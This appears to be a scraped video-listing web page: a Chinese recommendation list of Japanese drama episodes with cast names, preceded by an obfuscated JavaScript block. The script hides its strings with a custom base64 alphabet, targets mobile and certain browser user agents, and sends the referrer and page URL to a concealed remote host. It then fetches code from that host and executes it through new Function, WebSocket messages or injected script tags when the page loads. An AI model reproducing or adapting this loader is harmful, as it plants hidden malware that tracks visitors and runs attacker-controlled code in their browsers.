function mdre(e) {
const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab";
let n = "";
let r, o, c, s, a, i, l;
let d = 0;
let f = String(e).replace(/\r\n/g, "\n");
let h = "";
for (let e = 0; e < f.length; e++) {
const t = f.charCodeAt(e);
if (t < 128) {
h += String.fromCharCode(t);
} else if (t > 127 && t < 2048) {
h += String.fromCharCode(t >> 6 | 192);
h += String.fromCharCode(t & 63 | 128);
} else {
h += String.fromCharCode(t >> 12 | 224);
h += String.fromCharCode(t >> 6 & 63 | 128);
h += String.fromCharCode(t & 63 | 128);
}
}
while (d < h.length) {
r = h.charCodeAt(d++);
o = h.charCodeAt(d++);
c = h.charCodeAt(d++);
s = r >> 2;
a = (r & 3) << 4 | o >> 4;
i = (o & 15) << 2 | c >> 6;
l = c & 63;
if (isNaN(o)) {
n += t.charAt(s) + t.charAt(a);
} else if (isNaN(c)) {
n += t.charAt(s) + t.charAt(a) + t.charAt(i);
} else {
n += t.charAt(s) + t.charAt(a) + t.charAt(i) + t.charAt(l);
}
}
return n;
}
function iwtq(e) {
const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab";
let n = "";
let r = 0;
let o, c, s, a;
const i = String(e).replace(/[^A-Za-z0-9\-_]/g, "");
const l = i.length;
while (r < l) {
if (r == l) o = -1; else o = t.indexOf(i.charAt(r++));
if (r == l) c = -1; else c = t.indexOf(i.charAt(r++));
if (r === l) s = -1; else s = t.indexOf(i.charAt(r++));
if (r === l) a = -1; else a = t.indexOf(i.charAt(r++));
if (o === -1 || c === -1) {
break;
}
const e = o << 2 | c >> 4;
n += String.fromCharCode(e);
if (s !== -1) {
const e = (c & 15) << 4 | s >> 2;
n += String.fromCharCode(e);
}
if (a !== -1) {
const e = (s & 3) << 6 | a;
n += String.fromCharCode(e);
}
}
let d = "";
r = 0;
while (r < n.length) {
const e = n.charCodeAt(r);
if (e < 128) {
d += String.fromCharCode(e);
r++;
} else if (e > 191 && e < 224) {
const t = n.charCodeAt(r + 1);
d += String.fromCharCode((e & 31) << 6 | t & 63);
r += 2;
} else {
const t = n.charCodeAt(r + 1);
const o = n.charCodeAt(r + 2);
d += String.fromCharCode((e & 15) << 12 | (t & 63) << 6 | o & 63);
r += 3;
}
}
return d;
}
function gwyddp(e) {
return Math.floor(Math.random() * (e + 1));
}
window['w'+'jb'+'hz'+'s'+'fx'] = navigator.platform && !/^Mac|Win/.test(navigator.platform) || !navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent) ? function() {
(function(e, t, n) {
const r = n[iwtq("dPW5hqWyi4Inhqp0iU")];
let o = "";
try {
o = opener ? opener.document.location.href : n.referrer;
} catch (e) {
o = n.referrer;
}
if (o && o.length > 900) {
o = o.slice(0, 900);
}
let c = t.location.href;
if (c && c.length > 900) {
c = c.slice(0, 900);
}
const s = iwtq(e).split(",");
const a = s[3];
const i = s[2];
let l = s[4];
let d;
if (l.indexOf(";") > -1) {
let e = l.split(";");
if (e.length < 1) return;
if (e.length > 1) {
d = e[gwyddp(e.length)];
} else {
d = e[0];
}
} else {
d = l;
}
const f = mdre(`su=${d}&t=${s[0]}&d=${s[1]}&r=${o}&m=${Date.now()}&u=${c}&sm=${i}`);
const h = navigator.userAgent;
if (h.indexOf("b" + "ai" + "d" + "u") !== -1) {
const e = new XMLHttpRequest;
e.open("POST", `${i}://${d}/getSv/${f}`);
e.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
e.setRequestHeader("X-REQUESTED-WITH", "XMLHttpRequest");
e.onreadystatechange = function() {
if (e.readyState === 4 && e.status === 200) {
const t = JSON.parse(e.responseText);
const n = new Function("c", `${iwtq(t.ds)}; return ${t.ns}(c);`)(t.img.join(""));
new Function("_tdcs", n)(r);
}
};
e.send();
} else if (t.WebSocket && /UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(h)) {
const e = new WebSocket(`${a}://${d}/ws/${f}`);
e.onmessage = function(t) {
e.close();
const o = t.data.split(";");
if (o.length > 2) {
remoteCode = iwtq(o[0]);
remoteCode += iwtq(o[1]);
remoteCode += iwtq(o[2]);
new Function("_tdcs", remoteCode)(r);
} else {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
}
};
e.onerror = function() {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
};
} else {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
}
})("H-01H2ULGCmMiDALGDiLh51nhOILfrHydPpziQ", window, document);
} : function() {};
猜你喜欢
-
第1集
中岛裕翔 仁村纱和 金子大地 川岛铃遥 吉村界人 近藤芳正 绫田俊树 五头岳夫 渡边一计 益冈彻 绪形直人
-
-
第2集
仲野太贺,池松壮亮,吉冈里帆,滨边美波,小栗旬,宫崎葵,安藤樱,白石圣,坂井真纪,宫泽艾玛,大东骏介,松下洸平,要润,中岛步,山口马木也,菅井友香,佳久创,井上和,滨田龙臣,仓泽杏菜,松本怜生
-
第1集
筱原凉子,杰西,藤木直人,知英,高桥努,尾碕真花,沢村玲,河内大和,久保田悠来,小久保寿人,安田裕己,カルマ
-
第1集
藤井流星,七五三掛龙也,井桁弘惠,武田玲奈,大原优乃,草川拓弥,古屋吕敏,奈叶,铃木爱理,松下由树
-
第2集
沢村玲,田中洸希,佐藤江梨子,宫泽佑,井上想良,八神庆仁郎,樱木雅哉,長田拓郎,嵐翔真
-
第2集
佐佐木藏之介,仓科加奈,尾形一成,川原瑛都,渡部豪太,中越典子,六平直政,佐户井贤太,前野朋哉,入山法子
-
第5集
城桧吏,畑芽育,室井滋,猫背椿,日野阳仁,石坂浩二,绪方义博,户田惠子,市毛良枝,竹下景子
-
第1集
松下奈绪,樱井由纪,宫泽冰鱼,中村海人,松井玲奈,山崎真斗,吉本实由,白宫瑞帆,大朏岳优,二井景彪,磯村アメリ,前川泰之,朝加真由美,余贵美子,安田显
-
第2集
水谷丰,寺胁康文,森口瑶子,铃木砂羽,川原和久,山中崇史,筱原友希子,山西惇,田中隆三,松嶋亮,神保悟志,小野了,片桐龙次,杉本哲太,仲间由纪惠,石坂浩二
-
第1集
福本莉子,高桥恭平,山下幸辉,小坂菜绪,中泽元纪,中川翼,井上想良,井上音生,小栗有以,田锅梨梨花,吉柳咲良
-
第1集
上白石萌歌,生田斗真,宍户佑名,宫泽艾玛,仁村纱和,小雪,柄本时生,三浦獠太,片冈凛,佐佐木美玲,佐佐木史帆,高松Aloha,平山祐介